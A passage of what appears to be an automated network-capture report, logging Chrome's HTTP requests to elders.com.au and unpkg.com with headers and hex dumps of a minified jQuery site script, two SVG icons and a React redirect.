                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:46 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Mon, 30 Sep 2024 10:02:26 GMT
                                                                                                                                                                                                            etag: W/"250df-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 585174
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210119-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1727690545.479718,VS0,VS0,VE1003
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b00fce5f46cc-DFW
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC741INData Raw: 37 64 32 61 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 73 69 74 65 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 36 31 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 65 78 70 6f 72 74 73 3f 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 6f 63 75 6d 65 6e 74 3f 6e 28 74 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20
                                                                                                                                                                                                            Data Ascii: 7d2a/*! For license information please see site.js.LICENSE.txt */!function(){var e={616:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 6e 74 2c 77 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 6f 2c 69 3d 28 6e 3d 6e 7c 7c 62 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 69 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 77 29 28 6f 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 6f 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 69 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29
                                                                                                                                                                                                            Data Ascii: nt,w={type:!0,src:!0,nonce:!0,noModule:!0};function x(e,t,n){var r,o,i=(n=n||b).createElement("script");if(i.text=e,t)for(r in w)(o=t[r]||t.getAttribute&&t.getAttribute(r))&&i.setAttribute(r,o);n.head.appendChild(i).parentNode.removeChild(i)}function L(e)
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 2e 70 75 73 68 53 74 61 63 6b 28 6e 3e 3d 30 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 63 2c 73 6f 72 74 3a 69 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 69 2e 73 70 6c 69 63 65 7d 2c 43 2e 65 78 74 65 6e 64 3d 43 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 6f 2c 69 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 63 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 63 3d 61
                                                                                                                                                                                                            Data Ascii: .pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:c,sort:i.sort,splice:i.splice},C.extend=C.fn.extend=function(){var e,t,n,r,o,i,a=arguments[0]||{},s=1,l=arguments.length,c=!1;for("boolean"==typeof a&&(c=a
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 26 28 53 28 4f 62 6a 65 63 74 28 65 29 29 3f 43 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 63 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 75 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6b 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72
                                                                                                                                                                                                            Data Ascii: &(S(Object(e))?C.merge(n,"string"==typeof e?[e]:e):c.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!k.test(t||n&&n.nodeName||"HTML")},mer
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 63 65 28 6a 2c 50 29 7d 3b 76 61 72 20 4d 3d 62 2c 4f 3d 63 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 61 2c 6c 2c 63 2c 64 2c 70 2c 68 2c 6d 3d 4f 2c 76 3d 43 2e 65 78 70 61 6e 64 6f 2c 79 3d 30 2c 62 3d 30 2c 77 3d 65 65 28 29 2c 78 3d 65 65 28 29 2c 4c 3d 65 65 28 29 2c 45 3d 65 65 28 29 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 53 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f
                                                                                                                                                                                                            Data Ascii: ce(j,P)};var M=b,O=c;!function(){var e,t,n,o,a,l,c,d,p,h,m=O,v=C.expando,y=0,b=0,w=ee(),x=ee(),L=ee(),E=ee(),k=function(e,t){return e===t&&(a=!0),0},S="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|reado
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 5c 5c 66 5d 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 7a 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 4a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 56 3d 2f 5b 2b 7e 5d 2f 2c 59 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e
                                                                                                                                                                                                            Data Ascii: \\f]*\\)|)(?=[^-]|$)","i")},z=/^(?:input|select|textarea|button)$/i,X=/^h\d$/i,J=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,V=/[+~]/,Y=new RegExp("\\\\[\\da-fA-F]{1,6}[\\x20\\t\\r\\n\\f]?|\\\\([^\\r\\n\\f])","g"),G=function(e,t){var n="0x"+e.slice(1)-65536;return
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 29 75 5b 69 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 64 65 28 75 5b 69 5d 29 3b 66 3d 75 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 6d 2e 61 70 70 6c 79 28 6e 2c 68 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 66 29 29 2c 6e 7d 63 61 74 63 68 28 74 29 7b 45 28 65 2c 21 30 29 7d 66 69 6e 61 6c 6c 79 7b 73 3d 3d 3d 76 26 26 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 79 65 28 65 2e 72 65 70 6c 61 63 65 28 4e 2c 22 24 31 22 29 2c 74 2c 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 6e 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 65 2e 70 75 73 68 28 72 2b 22 20
                                                                                                                                                                                                            Data Ascii: )u[i]=(s?"#"+s:":scope")+" "+de(u[i]);f=u.join(",")}try{return m.apply(n,h.querySelectorAll(f)),n}catch(t){E(e,!0)}finally{s===v&&t.removeAttribute("id")}}}return ye(e.replace(N,"$1"),t,n,r)}function ee(){var e=[];return function n(r,o){return e.push(r+"
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 67 65 74 42 79 49 64 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 64 3d 43 2e 65 78 70 61 6e 64 6f 2c 21 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 43 2e 65 78 70 61 6e 64 6f 29 2e 6c 65 6e 67 74 68 7d 29 29 2c 67 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 68 2e 63 61 6c 6c 28 65 2c 22 2a 22 29 7d 29 29 2c 67 2e 73 63 6f 70 65 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 73 63 6f 70 65 22 29 7d 29 29 2c 67 2e 63 73 73 48 61 73
                                                                                                                                                                                                            Data Ascii: getById=ne((function(e){return c.appendChild(e).id=C.expando,!l.getElementsByName||!l.getElementsByName(C.expando).length})),g.disconnectedMatch=ne((function(e){return h.call(e,"*")})),g.scope=ne((function(){return l.querySelectorAll(":scope")})),g.cssHas
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 5c 5c 5b 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 53 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 76 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 76 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22
                                                                                                                                                                                                            Data Ascii: ySelectorAll("[selected]").length||p.push("\\[[\\x20\\t\\r\\n\\f]*(?:value|"+S+")"),e.querySelectorAll("[id~="+v+"-]").length||p.push("~="),e.querySelectorAll("a#"+v+"+*").length||p.push(".#.+[+~]"),e.querySelectorAll(":checked").length||p.push(":checked"
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 6e 67 74 68 3e 30 7d 2c 5a 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 6c 26 26 6c 65 28 65 29 2c 43 2e 63 6f 6e 74 61 69 6e 73 28 65 2c 74 29 7d 2c 5a 2e 61 74 74 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 6c 26 26 6c 65 28 65 29 3b 76 61 72 20 72 3d 74 2e 61 74 74 72 48 61 6e 64 6c 65 5b 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 6f 3d 72 26 26 66 2e 63 61 6c 6c 28 74 2e 61 74 74 72 48 61 6e 64 6c 65 2c 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 72 28 65 2c 6e 2c 21 64 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6f 3f 6f 3a 65
                                                                                                                                                                                                            Data Ascii: ngth>0},Z.contains=function(e,t){return(e.ownerDocument||e)!=l&&le(e),C.contains(e,t)},Z.attr=function(e,n){(e.ownerDocument||e)!=l&&le(e);var r=t.attrHandle[n.toLowerCase()],o=r&&f.call(t.attrHandle,n.toLowerCase())?r(e,n,!d):void 0;return void 0!==o?o:e


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            63192.168.2.457730172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:47 UTC420OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-magnifier.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC587INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"304-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 46916
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210175-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730285979.712973,VS0,VS0,VE682
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b01b5dc72cde-DFW
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC779INData Raw: 33 30 34 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 31 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 39 2e 30 30 30 37 20 31 39 2e 39 39 39 38 4c 31 32 2e 30 39 36 37 20 31 33 2e 30 39 35 38 4d 31 32 2e 30 39 36 37 20 31 33 2e 30 39 35 38 43 31 32 2e 37 30 39 34 20 31 32 2e 34 39 34 32 20 31 33 2e 31 39 36 39 20 31 31 2e 37 37 37 33 20 31 33 2e 35 33 30 39 20 31 30 2e 39 38 36 33 43 31 33 2e 38 36 34 39 20 31 30 2e 31 39 35 33 20 31 34 2e 30 33 39 20 39 2e 33 34 36 20 31 34 2e 30 34 32 39 20 38 2e 34 38 37 33 39 43 31 34 2e
                                                                                                                                                                                                            Data Ascii: 304<svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M19.0007 19.9998L12.0967 13.0958M12.0967 13.0958C12.7094 12.4942 13.1969 11.7773 13.5309 10.9863C13.8649 10.1953 14.039 9.346 14.0429 8.48739C14.
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            64192.168.2.457738172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:47 UTC415OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC587INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"4ca-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 45440
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210077-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730285979.734085,VS0,VS0,VE676
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b01b48d8486d-DFW
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC782INData Raw: 34 63 61 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 63 6c 69 70 30 5f 38 34 30 37 5f 31 33 34 37 32 29 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 2e 35 20 32 32 2e 35 43 38 2e 33 32 38 34 33 20 32 32 2e 35 20 39 20 32 31 2e 38 32 38 34 20 39 20 32 31 43 39 20 32 30 2e 31 37 31 36 20 38 2e 33 32 38 34 33 20 31 39 2e 35 20 37 2e 35 20 31 39 2e 35 43 36 2e 36 37 31 35 37 20 31 39 2e 35 20 36 20 32 30 2e 31 37 31 36 20 36 20 32 31 43 36 20 32 31 2e 38 32 38
                                                                                                                                                                                                            Data Ascii: 4ca<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0_8407_13472)"><path d="M7.5 22.5C8.32843 22.5 9 21.8284 9 21C9 20.1716 8.32843 19.5 7.5 19.5C6.67157 19.5 6 20.1716 6 21C6 21.828
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC451INData Raw: 20 31 39 2e 39 37 39 36 20 31 33 2e 33 34 31 35 43 32 30 2e 31 31 36 33 20 31 33 2e 32 33 34 38 20 32 30 2e 32 31 31 39 20 31 33 2e 30 38 34 31 20 32 30 2e 32 35 20 31 32 2e 39 31 34 39 4c 32 31 2e 37 35 20 36 2e 31 36 34 39 31 43 32 31 2e 37 37 35 31 20 36 2e 30 35 33 36 33 20 32 31 2e 37 37 34 35 20 35 2e 39 33 38 30 38 20 32 31 2e 37 34 38 33 20 35 2e 38 32 37 30 36 43 32 31 2e 37 32 32 20 35 2e 37 31 36 30 34 20 32 31 2e 36 37 30 38 20 35 2e 36 31 32 34 37 20 32 31 2e 35 39 38 35 20 35 2e 35 32 34 32 34 43 32 31 2e 35 32 36 31 20 35 2e 34 33 36 20 32 31 2e 34 33 34 37 20 35 2e 33 36 35 34 33 20 32 31 2e 33 33 30 39 20 35 2e 33 31 37 39 43 32 31 2e 32 32 37 32 20 35 2e 32 37 30 33 36 20 32 31 2e 31 31 34 20 35 2e 32 34 37 31 31 20 32 31 20 35 2e 32 34
                                                                                                                                                                                                            Data Ascii: 19.9796 13.3415C20.1163 13.2348 20.2119 13.0841 20.25 12.9149L21.75 6.16491C21.7751 6.05363 21.7745 5.93808 21.7483 5.82706C21.722 5.71604 21.6708 5.61247 21.5985 5.52424C21.5261 5.436 21.4347 5.36543 21.3309 5.3179C21.2272 5.27036 21.114 5.24711 21 5.24
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            65192.168.2.457732104.17.245.2034432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:47 UTC567OUTGET /react@18/umd/react.development.js HTTP/1.1
                                                                                                                                                                                                            Host: unpkg.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC545INHTTP/1.1 302 Found
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:48 GMT
                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            cache-control: public, s-maxage=600, max-age=60
                                                                                                                                                                                                            location: /react@18.3.1/umd/react.development.js
                                                                                                                                                                                                            vary: Accept
                                                                                                                                                                                                            via: 1.1 fly.io
                                                                                                                                                                                                            fly-request-id: 01JBZYS29WWR3JBQAGJS80TFHV-dfw
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 444
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b01b5de26b6a-DFW
                                                                                                                                                                                                            2024-11-06 05:29:48 UTC66INData Raw: 33 63 0d 0a 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 72 65 61 63 74 40 31 38 2e 33 2e 31 2f 75 6d 64 2f 72 65 61 63 74 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0d 0a
